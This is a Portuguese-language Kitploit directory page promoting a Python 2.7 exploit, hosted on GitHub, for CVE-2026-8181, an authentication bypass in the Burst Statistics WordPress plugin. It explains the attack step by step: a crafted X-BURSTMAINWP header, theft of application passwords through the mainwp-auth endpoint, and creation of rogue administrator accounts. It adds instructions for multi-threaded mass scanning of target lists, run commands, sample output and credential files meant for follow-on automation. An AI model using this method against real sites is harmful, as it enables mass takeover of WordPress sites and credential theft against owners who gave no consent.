Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-8181 — CVE-2026-8181: Bypass de Auth do Burst Statistics → takeover da API REST e criação de admin. Python 2.7. Apenas para uso educacional. | Kitploit
Ferramentas/GitHubGitHub/jenderal92/cve-2026-8181
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Bypass de Auth do Burst Statistics → takeover da API REST e criação de admin. Python 2.7. Apenas para uso educacional.

Ver Repositório
5há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-8181 - Exploração de Bypass de Autenticação do Burst Statistics

Python 2.7 exploit para a vulnerabilidade do plugin Burst Statistics (CVE-2026-8181) que permite a atacantes não autenticados contornar a autenticação da API REST, recuperar senhas de aplicativos e criar novos usuários administradores em sites WordPress vulneráveis.

⚠️ Aviso
Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas informáticos é ilegal. Use apenas em sites que você possui ou para os quais tenha permissão explícita para testar. Mais avisos: Você pode ver o aviso na capa de Jenderal92. Pode verificá-lo AQUI !!!

O CVE-2026-8181 afeta o plugin Burst Statistics para WordPress (versões anteriores ao patch). A falha reside no mecanismo de autenticação da API REST, permitindo que um atacante:

  • Contorne a autenticação enviando um cabeçalho X-BURSTMAINWP manipulado
  • Recupere senhas de aplicativos através do endpoint /burst/v1/mainwp-auth
  • Execute ações privilegiadas (listar usuários, ler configurações, criar novas contas de administrador) através da API REST do WordPress

Funcionalidades

  • Varredura multi-thread (10 threads por padrão)
  • Detecção automática de caminhos base do WordPress (/, , )
/wordpress
/wp
  • Enumeração de nomes de usuário via /wp-json/wp/v2/users ou redirecionamentos por ID de autor
  • Exploração do bypass de autenticação para:
    • Obter senhas de aplicativos (token codificado em Base64)
    • Verificar acesso a endpoints REST sensíveis (configurações, plugins, usuários admin)
    • Criar um novo usuário administrador com credenciais aleatórias
  • Dois arquivos de saída:
    • res_login.txt – Credenciais REST API concisas, separadas por pipe (fáceis de analisar/importar)
    • full_res_login.txt – Relatório completo legível por humanos, incluindo verificação de acesso e senhas de aplicativos
  • Requisitos

    • Python 2.7 (obsoleto, mas necessário para o script)
    • Biblioteca requests
    root@kitploit:~
    pip install requests
    

    Uso

    1. Prepare um arquivo de lista de alvos (um domínio ou IP por linha, com ou sem http:///https://).

      Exemplo targets.txt:

      root@kitploit:~
      example.com
      https://vulnerable-site.com
      127.0.0.1/wordpress
      
    2. Execute o exploit:

    root@kitploit:~
    python2 CVE-2026-8181.py targets.txt
    
    1. Os resultados são salvos em dois arquivos no diretório atual:
      • res_login.txt – Credenciais REST API (uma linha por alvo vulnerável)
      • full_res_login.txt – Relatório detalhado

    Opções da Linha de Comando

    ArgumentoDescrição
    list.txtCaminho para o arquivo que contém as URLs alvo

    Exemplo de Saída (Console)

    root@kitploit:~
    ============================================================
    CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
    ============================================================
    [*] Total targets: 2
    [*] Threads: 10
    [*] Base paths: ['', '/wordpress', '/wp']
    
    [*] Scanning: example.com
        Trying path: /
        Detected username: admin
        [+] VULNERABLE! REST API bypass successful
        [+] Application Password obtained!
        [+]   Username: admin
        [+]   App Password: xxxx xxxx xxxx
        [+]   Base64 Token: YWRtaW46eHh4eA==
        [+] Access confirmed: WordPress settings
        [+] Access confirmed: Installed plugins
        [+] Access confirmed: Admin users
        [+] Admin user created via REST API: wp_abc123
        [+] Results saved to res_login.txt and full_res_login.txt
    

    Formatos dos Arquivos de Saída

    1. res_login.txt – Credenciais REST API Concisas

    Cada linha segue este formato separado por pipe:

    root@kitploit:~
    alvo|nome_utilizador|palavra_passe|email|id_utilizador
    

    Exemplo:

    root@kitploit:~
    http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
    

    Este formato é ideal para:

    • Importar para gestores de palavras-passe ou bases de dados
    • Automatizar ações adicionais (por exemplo, scripts de login)
    • Inspeção rápida com cut, grep ou Excel

    2. full_res_login.txt – Relatório Detalhado Completo

    Para cada alvo vulnerável, o script anexa um bloco legível por humanos:

    root@kitploit:~
    ============================================================
    Target: http://example.com
    ============================================================
    
    [+] Access Verification:
        [+] WordPress settings
        [+] Installed plugins
        [+] Admin users
    
    [+] REST API Credentials:
        Username: wp_abc123
        Password: random12char
        Email: [email protected]
        User ID: 42
        URL: http://example.com/wp-admin/
        Note: Use with X-BURSTMAINWP header
    
    [+] Application Password:
        Username: admin
        App Password: xxxx xxxx xxxx
        Base64 Token: YWRtaW46eHh4eA==
    

    Nota: Se o endpoint de senha de aplicativo não estiver disponível ou não retornar nenhum token, essa seção mostrará FAILED.

    Como Funciona

    1. Preparação do alvo – Adiciona o prefixo http:// se estiver ausente, remove barras finais.
    2. Iteração de caminhos – Tenta /, /wordpress e /wp como diretórios base do WordPress.
    3. Enumeração de nomes de utilizador – Obtém /wp-json/wp/v2/users ou usa redirecionamentos ?author=N.
    4. Teste de bypass – Envia X-BURSTMAINWP: 1 + autenticação Basic com nome de utilizador e palavra-passe fictícia (CVE-2026-8181). Se o endpoint /wp-json/wp/v2/users/me?context=edit retornar 200, o site está vulnerável.
    5. Exploração –
      • Solicita /wp-json/burst/v1/mainwp-auth para recuperar um token de senha de aplicativo.
      • Verifica acesso a /settings, /plugins, /users.
      • Cria uma nova conta de administrador via POST /wp-json/wp/v2/users.
    6. Salvamento de resultados – Escreve credenciais REST concisas em res_login.txt e detalhes completos em full_res_login.txt.

    Personalização

    Pode modificar estas variáveis dentro do script:

    • THREADS – Número de threads simultâneas (padrão 10)
    • BASE_PATHS – Subdiretórios adicionais do WordPress a verificar
    • Valores de timeout da biblioteca requests

    Licença

    Este projeto é fornecido apenas para fins educacionais. Use por sua conta e risco.

    Referências

    • Detalhe do CVE-2026-8181 (hipotético)
    • Plugin Burst Statistics (versões afetadas)
    Baixar ferramenta